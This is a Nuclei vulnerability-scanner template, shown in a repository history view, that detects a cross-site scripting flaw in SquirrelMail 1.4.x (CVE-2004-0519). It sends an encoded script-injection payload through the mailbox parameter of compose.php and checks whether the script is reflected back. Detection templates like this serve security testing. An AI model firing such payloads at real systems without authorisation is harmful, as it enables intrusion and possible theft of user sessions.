nuclei-templates/cves/2004/CVE-2004-0519.yaml

31 lines
950 B
YAML
Raw Normal View History

2021-11-15 18:14:18 +00:00
id: CVE-2004-0519
info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
2021-11-16 10:13:03 +00:00
reference: https://www.exploit-db.com/exploits/24068
tags: xss,squirrelmail,cve2004,cve
2021-11-15 18:14:18 +00:00
requests:
- method: GET
path:
2021-11-16 10:13:03 +00:00
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-11-15 18:14:18 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
2021-11-16 10:13:03 +00:00
words:
- "</script><script>alert(document.domain)</script>"
2021-11-15 18:14:18 +00:00
- type: word
2021-11-16 10:13:03 +00:00
part: header
2021-11-15 18:14:18 +00:00
words:
- "text/html"